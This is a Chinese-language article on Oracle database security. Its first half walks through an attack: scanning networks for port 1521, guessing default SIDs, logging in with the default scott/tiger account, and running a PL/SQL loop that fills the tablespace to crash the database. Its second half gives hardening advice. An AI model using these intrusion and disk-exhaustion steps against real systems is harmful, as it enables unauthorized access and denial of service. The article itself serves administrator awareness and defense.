--田月 人們經常聽到Windows的安全漏洞，頻繁的遭受病毒攻擊等，我們的傳統觀念是 Windows太不安全了；實際上Unix/Linux假如配置不當，其危險性遠遠高出人們的想象，大部分人非常重視操作系統的安全，但作為其最重要的數據庫應用，你注重它了么？本文旨在介紹數據庫級的安全，當然操作系統被攻破的話，那一切免談。 讓我帶你去試著攻擊一臺裝有Oracle的機器1、首先確定被攻擊Oracle的IP地址（無目的，那就去全網掃描吧，發現1521端口打開的就挑出來，不要說連掃描都不會，F..t）2、猜測它的SID號；好象很困難，事實上安裝Oracle時有缺省值，80%的人安裝時都不會去修改，或改為很輕易猜測的值，比如：ORCL、ORA、ORA8、ORA9、ORACLE、ORACLE8、ORACLE9、ORACLE8I、ORACLE817、ORACLE92...3、連接后，猜測用戶名和口令；好象更困難，事實上安裝 Oracle時，SYS、SYSTEM等系統用戶有缺省口令，可惜在9i中，終于改為需用戶自己確定口令(不過大部分用戶還是沿用以前的口令或使用'oracle')，而且還有被人們遺忘的用戶，比如SCOTT，缺省安裝時他會被建立起來的。4、sqlplus scott/tiger@ora_sid 終于登陸進來，可是這個小用戶只是用來做測試學習的，我們用他來干什么呢？鍵入：SQL> select USERNAME,DEFAULT_TABLESPACE from USER_USERS;USERNAME;;;;DEFAULT_TABLESPACE------------------------------ ------------------------------SCOTT; USERSSQL> select * from session_privs;PRIVILEGE----------------------------------------CREATE SESSIONALTER SESSIONUNLIMITED TABLESPACECREATE TABLECREATE CLUSTERCREATE SYNONYMCREATE VIEWCREATE SEQUENCECREATE DATABASE LINKCREATE PROCEDURECREATE TRIGGERCREATE TYPECREATE OPERATORCREATE INDEXTYPESQL> select * from user_ts_quotas;TABLESPACE_NAME;;BYTES; MAX_BYTES;;BLOCKS MAX_BLOCKS------------------------------ ---------- ---------- ---------- ----------SYSTEM;;524288; 0 64; 0USERS;;;;65536; 0; 8; 0什么意思呢？意思是我們的這個用戶是數據缺省是建在USERS表空間上的，擁有建表等權限，而USERS表空間的磁盤使用是無限制的，聰明的讀者應該明白我們可以在這里寫入很多數據直到占滿它的磁盤，造成數據庫無法使用......我們試試吧先建張表SQL> CREATE TABLE TEST (A CHAR(30));這張TEST表只有一個字段A再寫個PL/SQL過程DECLAREv_number varchar2(30);m_number varchar2(30):=999999999999999999999999999999;--m_number的值代表了插入多少行數據，可修改但不能超過30位。 beginFOR v_number IN 1..m_number LOOPinsert into TEST(A) values(m_number);commit;end LOOP;end;/ 上面的PL/SQL過程表示給TEST表中A列循環插入'999999999999999999999999999999'值，共計999999999999999999999999999999行。以每行30 byte來算，共計2000000多億T大小吧，即便他是IBM大鯊魚的陣列存儲，也扛不住。 當然，你也可以增加幾個列，減少m_number值，可以加快速度的。 這里再提醒大家一個Oracle缺省用戶DBSNMP，幾乎所有稍高版本的典型安裝都會創建它，危險指數高于SCOTT，因為它是創建在SYSTEM表空間的......F..t 講了半天，DBA們快看看自己的系統，一般來說成功率相當高。下面我們開始講講如何作好安全防護：1、啟用防火墻。很多單位的數據庫都沒有防火墻保護，或防火墻配置為透明。實際上防火墻可以有效的阻止掃描 ,假如做了NAT、地址限制、禁止ICMP等就更好了，讓別人在外網看不到你的數據庫。2、加大多層結構數據庫應用的建設。傳統的C/S盡管有很多優勢，但在安全性上實在令人擔心。很多程序開發者會將數據庫的用戶名和密碼直接寫在客戶端程序中，認為編譯后會很安全，但事實上你用文本編輯器打開過這個客戶端程序嗎？你會吃驚的發現竟然可以看到用戶名和密碼。多層結構就沒有這個問題，前臺就是個瀏覽器或簡單的客戶端，可能會影響效率但在需要全網公開提供服務的情況下肯定是首選。3、去除Oracle里用不到的組件，比如Jserver、Agent、遠程治理等等，這些強大的功能都是安全隱患，9I的AS存在緩沖溢出漏洞，假如你裝了就做祈禱吧...4、修改缺省用戶的密碼，自建用戶加強口令治理和復雜度。用system用戶進入執行SQL> select username from dba_users;USERNAME------------------------------SYSSYSTEMOUTLNDBSNMPTESTSCOTTRMANTEST1SQL> select * from session_privs;PRIVILEGE----------------------------------------CREATE SESSIONALTER SESSIONCREATE TABLECREATE CLUSTERCREATE SYNONYMCREATE VIEWCREATE SEQUENCECREATE DATABASE LINKSELECT ANY DICTIONARY看看你系統到底存在哪些用戶，口令修改了嗎，夠復雜嗎,相應的權限是否有擴大的嫌疑？5、作好數據備份具體這里就不多說了，CSDN相關版塊里有具體的帖子描述Oracle備份機制。6、合理劃分文件系統*在Unix/Linux下使用df -k檢查你的文件系統，不同用戶使用不同的表空間，不同的表空間建在不同的文件系統，千萬不要把應用建在SYSTEM表空間上，回滾/重做表空間的治理也不容忽視；SQL> host df -kFilesystem1K-blocks;;;Used Available Use% Mounted on/dev/hda2;;;503631621008322679652; 44% //dev/hda3;;;50363164381292;399192; 92% /oraclenone;256144 0;2561440% /dev/shm/dev/hda5;;;2016016;8631441050460; 46% /data1/dev/hda7;;;6166948;5581765295508; 10% /data2/dev/cdrom;;;;81762;;81762 0 100% /mnt/cdromSQL> select file_name,tablespace_name from dba_data_filFILE_NAME-------------------------------------------------------TABLESPACE_NAME------------------------------/oracle/prodUCt/9.2.01/oradata/system.dbfSYSTEM/oracle/product/9.2.01/oradata/undotbs.dbfUNDOTBS/data1/oradata/data1.dbfDATA1/data2/oradata/data2.dbfDATA2*在Windows下，使用資源治理器檢查你的分區，不同的表空間建在不同的分區上，同樣千萬不要把SYSTEM表空間和應用放在一起。 當然，安全治理浩如煙海，這篇文章全當拋磚引玉......